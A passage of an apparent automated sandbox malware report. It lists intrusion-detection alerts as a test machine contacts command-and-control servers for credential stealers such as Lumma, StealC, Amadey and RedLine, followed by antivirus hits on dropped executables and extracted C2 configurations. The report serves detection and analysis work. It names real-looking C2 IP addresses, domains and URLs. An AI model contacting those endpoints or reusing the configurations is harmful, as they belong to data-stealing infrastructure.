2025-02-08T20:23:55.725528+0100	2028371	3	Unknown Traffic	192.168.2.4	63804	188.114.96.3	443	TCP
2025-02-08T20:23:57.342553+0100	2028371	3	Unknown Traffic	192.168.2.4	63805	188.114.96.3	443	TCP

ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:44.433577+0100	2035595	1	Domain Observed Used for C2 Detected	159.100.19.137	7707	192.168.2.4	63760	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:15.816514+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.3	443	TCP
2025-02-08T20:21:17.241486+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	188.114.96.3	443	TCP
2025-02-08T20:21:29.104973+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	188.114.96.3	443	TCP
2025-02-08T20:22:45.423528+0100	2054653	1	A Network Trojan was detected	192.168.2.4	55428	104.21.38.167	443	TCP
2025-02-08T20:22:46.508953+0100	2054653	1	A Network Trojan was detected	192.168.2.4	55435	104.21.38.167	443	TCP
2025-02-08T20:23:05.902155+0100	2054653	1	A Network Trojan was detected	192.168.2.4	55534	104.21.38.167	443	TCP
2025-02-08T20:23:15.098787+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63718	188.114.96.3	443	TCP
2025-02-08T20:23:16.481680+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63719	188.114.96.3	443	TCP
2025-02-08T20:23:21.274647+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63728	172.67.150.254	443	TCP
2025-02-08T20:23:22.561230+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63730	172.67.150.254	443	TCP
2025-02-08T20:23:32.052527+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63744	188.114.96.3	443	TCP
2025-02-08T20:23:36.445840+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63752	172.67.150.254	443	TCP
2025-02-08T20:23:44.404766+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63761	172.67.150.254	443	TCP
2025-02-08T20:23:45.824454+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63763	172.67.150.254	443	TCP
2025-02-08T20:23:48.021077+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63769	188.114.96.3	443	TCP
2025-02-08T20:23:49.633436+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63778	188.114.96.3	443	TCP
2025-02-08T20:23:53.753498+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63794	188.114.96.3	443	TCP
2025-02-08T20:23:54.756833+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63797	188.114.96.3	443	TCP
2025-02-08T20:23:55.752669+0100	2054653	1	A Network Trojan was detected	192.168.2.4	63803	172.67.150.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:15.816514+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.3	443	TCP
2025-02-08T20:22:45.423528+0100	2049836	1	A Network Trojan was detected	192.168.2.4	55428	104.21.38.167	443	TCP
2025-02-08T20:23:15.098787+0100	2049836	1	A Network Trojan was detected	192.168.2.4	63718	188.114.96.3	443	TCP
2025-02-08T20:23:21.274647+0100	2049836	1	A Network Trojan was detected	192.168.2.4	63728	172.67.150.254	443	TCP
2025-02-08T20:23:44.404766+0100	2049836	1	A Network Trojan was detected	192.168.2.4	63761	172.67.150.254	443	TCP
2025-02-08T20:23:48.021077+0100	2049836	1	A Network Trojan was detected	192.168.2.4	63769	188.114.96.3	443	TCP
2025-02-08T20:23:53.753498+0100	2049836	1	A Network Trojan was detected	192.168.2.4	63794	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:17.241486+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	188.114.96.3	443	TCP
2025-02-08T20:22:46.508953+0100	2049812	1	A Network Trojan was detected	192.168.2.4	55435	104.21.38.167	443	TCP
2025-02-08T20:23:16.481680+0100	2049812	1	A Network Trojan was detected	192.168.2.4	63719	188.114.96.3	443	TCP
2025-02-08T20:23:22.561230+0100	2049812	1	A Network Trojan was detected	192.168.2.4	63730	172.67.150.254	443	TCP
2025-02-08T20:23:45.824454+0100	2049812	1	A Network Trojan was detected	192.168.2.4	63763	172.67.150.254	443	TCP
2025-02-08T20:23:49.633436+0100	2049812	1	A Network Trojan was detected	192.168.2.4	63778	188.114.96.3	443	TCP
2025-02-08T20:23:54.756833+0100	2049812	1	A Network Trojan was detected	192.168.2.4	63797	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:47.860710+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.4	63769	188.114.96.3	443	TCP
2025-02-08T20:23:48.817730+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.4	63778	188.114.96.3	443	TCP
2025-02-08T20:23:51.455249+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.4	63787	188.114.96.3	443	TCP
2025-02-08T20:23:52.672294+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.4	63788	188.114.96.3	443	TCP
2025-02-08T20:23:53.764150+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.4	63796	188.114.96.3	443	TCP
2025-02-08T20:23:55.249021+0100	2059926	1	Domain Observed Used for C2 Detected	192.168.2.4	63802	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:21.132473+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63728	172.67.150.254	443	TCP
2025-02-08T20:23:21.788741+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63730	172.67.150.254	443	TCP
2025-02-08T20:23:23.217976+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63734	172.67.150.254	443	TCP
2025-02-08T20:23:28.150082+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63738	172.67.150.254	443	TCP
2025-02-08T20:23:29.243981+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63742	172.67.150.254	443	TCP
2025-02-08T20:23:30.786626+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63743	172.67.150.254	443	TCP
2025-02-08T20:23:32.585799+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63746	172.67.150.254	443	TCP
2025-02-08T20:23:34.906466+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63752	172.67.150.254	443	TCP
2025-02-08T20:23:44.261085+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63761	172.67.150.254	443	TCP
2025-02-08T20:23:45.040287+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63763	172.67.150.254	443	TCP
2025-02-08T20:23:46.475559+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63766	172.67.150.254	443	TCP
2025-02-08T20:23:48.779681+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63776	172.67.150.254	443	TCP
2025-02-08T20:23:50.045044+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63781	172.67.150.254	443	TCP
2025-02-08T20:23:51.278523+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63786	172.67.150.254	443	TCP
2025-02-08T20:23:52.985871+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63790	172.67.150.254	443	TCP
2025-02-08T20:23:55.262260+0100	2059928	1	Domain Observed Used for C2 Detected	192.168.2.4	63803	172.67.150.254	443	TCP

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:45.793664+0100	2045000	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.4	63758	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:22:13.210871+0100	2044696	1	A Network Trojan was detected	192.168.2.4	55236	185.215.113.43	80	TCP
2025-02-08T20:22:16.845532+0100	2044696	1	A Network Trojan was detected	192.168.2.4	55254	185.215.113.43	80	TCP
2025-02-08T20:22:35.837042+0100	2044696	1	A Network Trojan was detected	192.168.2.4	55371	185.215.113.43	80	TCP
2025-02-08T20:22:40.849595+0100	2044696	1	A Network Trojan was detected	192.168.2.4	55401	185.215.113.43	80	TCP
2025-02-08T20:22:45.941740+0100	2044696	1	A Network Trojan was detected	192.168.2.4	55434	185.215.113.43	80	TCP
2025-02-08T20:22:50.688282+0100	2044696	1	A Network Trojan was detected	192.168.2.4	55471	185.215.113.43	80	TCP
2025-02-08T20:22:56.400061+0100	2044696	1	A Network Trojan was detected	192.168.2.4	55502	185.215.113.43	80	TCP
2025-02-08T20:23:02.294419+0100	2044696	1	A Network Trojan was detected	192.168.2.4	55529	185.215.113.43	80	TCP
2025-02-08T20:23:11.233350+0100	2044696	1	A Network Trojan was detected	192.168.2.4	55538	185.215.113.43	80	TCP
2025-02-08T20:23:16.639779+0100	2044696	1	A Network Trojan was detected	192.168.2.4	63721	185.215.113.43	80	TCP
2025-02-08T20:23:22.425644+0100	2044696	1	A Network Trojan was detected	192.168.2.4	63731	185.215.113.43	80	TCP
2025-02-08T20:23:28.090533+0100	2044696	1	A Network Trojan was detected	192.168.2.4	63737	185.215.113.43	80	TCP
2025-02-08T20:23:33.673680+0100	2044696	1	A Network Trojan was detected	192.168.2.4	63747	185.215.113.43	80	TCP
2025-02-08T20:23:39.269692+0100	2044696	1	A Network Trojan was detected	192.168.2.4	63755	185.215.113.43	80	TCP
2025-02-08T20:23:44.825510+0100	2044696	1	A Network Trojan was detected	192.168.2.4	63762	185.215.113.43	80	TCP
2025-02-08T20:23:49.584158+0100	2044696	1	A Network Trojan was detected	192.168.2.4	63780	185.215.113.43	80	TCP
2025-02-08T20:23:54.988698+0100	2044696	1	A Network Trojan was detected	192.168.2.4	63798	185.215.113.43	80	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:49.583545+0100	2045001	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.4	63758	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:12.449134+0100	2059435	1	Domain Observed Used for C2 Detected	192.168.2.4	56007	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:01.772842+0100	2059189	1	Domain Observed Used for C2 Detected	192.168.2.4	64136	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:02.195606+0100	2059191	1	Domain Observed Used for C2 Detected	192.168.2.4	51873	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:11.845465+0100	2059429	1	Domain Observed Used for C2 Detected	192.168.2.4	59799	1.1.1.1	53	UDP
2025-02-08T20:23:12.402761+0100	2059429	1	Domain Observed Used for C2 Detected	192.168.2.4	63716	1.1.1.1	53	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:11.666813+0100	2059421	1	Domain Observed Used for C2 Detected	192.168.2.4	64417	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:01.988745+0100	2059199	1	Domain Observed Used for C2 Detected	192.168.2.4	63270	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:01.835261+0100	2059201	1	Domain Observed Used for C2 Detected	192.168.2.4	52617	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:11.711833+0100	2059425	1	Domain Observed Used for C2 Detected	192.168.2.4	65132	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:01.893821+0100	2059203	1	Domain Observed Used for C2 Detected	192.168.2.4	52349	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:12.417481+0100	2059431	1	Domain Observed Used for C2 Detected	192.168.2.4	59395	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:47.312783+0100	2059925	1	Domain Observed Used for C2 Detected	192.168.2.4	52306	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:12.492842+0100	2059433	1	Domain Observed Used for C2 Detected	192.168.2.4	50259	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:20.479768+0100	2059927	1	Domain Observed Used for C2 Detected	192.168.2.4	60149	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:02.087404+0100	2059207	1	Domain Observed Used for C2 Detected	192.168.2.4	49275	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:02.152843+0100	2059209	1	Domain Observed Used for C2 Detected	192.168.2.4	62867	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:11.763920+0100	2059427	1	Domain Observed Used for C2 Detected	192.168.2.4	57285	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:11.688617+0100	2059771	1	Domain Observed Used for C2 Detected	192.168.2.4	62755	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:01.815407+0100	2059211	1	Domain Observed Used for C2 Detected	192.168.2.4	56208	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:36.340058+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.4	49745	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:36.325460+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49745	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:36.563244+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49745	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:37.580949+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49745	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:36.583690+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.4	49745	TCP
2025-02-08T20:23:38.968349+0100	2044247	1	Malware Command and Control Activity Detected	5.75.215.154	443	192.168.2.4	63754	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:40.929731+0100	2051831	1	Malware Command and Control Activity Detected	5.75.215.154	443	192.168.2.4	63757	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:40.929528+0100	2049087	1	A Network Trojan was detected	192.168.2.4	63757	5.75.215.154	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:46.749799+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	63765	5.75.215.154	443	TCP
2025-02-08T20:23:47.860262+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	63768	5.75.215.154	443	TCP
2025-02-08T20:23:56.174191+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	63801	5.75.215.154	443	TCP
2025-02-08T20:23:58.345067+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	63806	5.75.215.154	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:23.299253+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49735	188.114.96.3	443	TCP
2025-02-08T20:22:49.992930+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	55450	104.21.38.167	443	TCP
2025-02-08T20:23:26.955612+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	63732	188.114.96.3	443	TCP
2025-02-08T20:23:27.574694+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	63734	172.67.150.254	443	TCP
2025-02-08T20:23:57.875766+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	63805	188.114.96.3	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:35.925494+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49745	185.215.113.115	80	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:44.433577+0100	2842478	1	Malware Command and Control Activity Detected	159.100.19.137	7707	192.168.2.4	63760	TCP
2025-02-08T20:23:52.888215+0100	2842478	1	Malware Command and Control Activity Detected	159.100.19.137	7707	192.168.2.4	63789	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:22:06.040816+0100	2856147	1	A Network Trojan was detected	192.168.2.4	55232	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:22:12.471955+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	55233	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:22:09.265760+0100	2803305	3	Unknown Traffic	192.168.2.4	55234	185.215.113.16	80	TCP
2025-02-08T20:22:13.928328+0100	2803305	3	Unknown Traffic	192.168.2.4	55238	185.215.113.16	80	TCP
2025-02-08T20:22:17.653672+0100	2803305	3	Unknown Traffic	192.168.2.4	55260	185.215.113.97	80	TCP
2025-02-08T20:22:36.620818+0100	2803305	3	Unknown Traffic	192.168.2.4	55376	185.215.113.97	80	TCP
2025-02-08T20:22:41.712777+0100	2803305	3	Unknown Traffic	192.168.2.4	55407	185.215.113.97	80	TCP
2025-02-08T20:22:46.667453+0100	2803305	3	Unknown Traffic	192.168.2.4	55442	185.215.113.97	80	TCP
2025-02-08T20:22:51.426027+0100	2803305	3	Unknown Traffic	192.168.2.4	55477	185.215.113.97	80	TCP
2025-02-08T20:22:57.169045+0100	2803305	3	Unknown Traffic	192.168.2.4	55507	185.215.113.97	80	TCP
2025-02-08T20:23:03.026323+0100	2803305	3	Unknown Traffic	192.168.2.4	55532	185.215.113.97	80	TCP
2025-02-08T20:23:12.059955+0100	2803305	3	Unknown Traffic	192.168.2.4	55539	185.215.113.97	80	TCP
2025-02-08T20:23:17.583948+0100	2803305	3	Unknown Traffic	192.168.2.4	63722	185.215.113.97	80	TCP
2025-02-08T20:23:23.153362+0100	2803305	3	Unknown Traffic	192.168.2.4	63733	185.215.113.97	80	TCP
2025-02-08T20:23:28.949679+0100	2803305	3	Unknown Traffic	192.168.2.4	63739	185.215.113.97	80	TCP
2025-02-08T20:23:34.373797+0100	2803305	3	Unknown Traffic	192.168.2.4	63750	185.215.113.97	80	TCP
2025-02-08T20:23:40.063396+0100	2803305	3	Unknown Traffic	192.168.2.4	63756	185.215.113.97	80	TCP
2025-02-08T20:23:45.656184+0100	2803305	3	Unknown Traffic	192.168.2.4	63764	185.215.113.97	80	TCP
2025-02-08T20:23:50.295734+0100	2803305	3	Unknown Traffic	192.168.2.4	63782	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:37.814908+0100	2803304	3	Unknown Traffic	192.168.2.4	49745	185.215.113.115	80	TCP
2025-02-08T20:21:54.751338+0100	2803304	3	Unknown Traffic	192.168.2.4	55224	185.215.113.115	80	TCP
2025-02-08T20:21:55.913732+0100	2803304	3	Unknown Traffic	192.168.2.4	55224	185.215.113.115	80	TCP
2025-02-08T20:21:56.729898+0100	2803304	3	Unknown Traffic	192.168.2.4	55224	185.215.113.115	80	TCP
2025-02-08T20:21:57.302212+0100	2803304	3	Unknown Traffic	192.168.2.4	55224	185.215.113.115	80	TCP
2025-02-08T20:21:58.962167+0100	2803304	3	Unknown Traffic	192.168.2.4	55224	185.215.113.115	80	TCP
2025-02-08T20:21:59.343394+0100	2803304	3	Unknown Traffic	192.168.2.4	55224	185.215.113.115	80	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:40.946425+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	63758	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:46.168953+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	63758	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:49.589472+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	63758	103.84.89.222	33791	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:58.345067+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	63806	5.75.215.154	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:03.470554+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	55531	104.102.49.254	443	TCP
2025-02-08T20:23:13.937797+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	63717	104.102.49.254	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:36.195663+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.4	63751	5.75.215.154	443	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:23:40.946425+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.4	63758	103.84.89.222	33791	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}
Source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7fOMOTQ[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Bjkm5hE[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cBeNU75[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\1AWhJsY[1].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Fe36XBk[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 70%
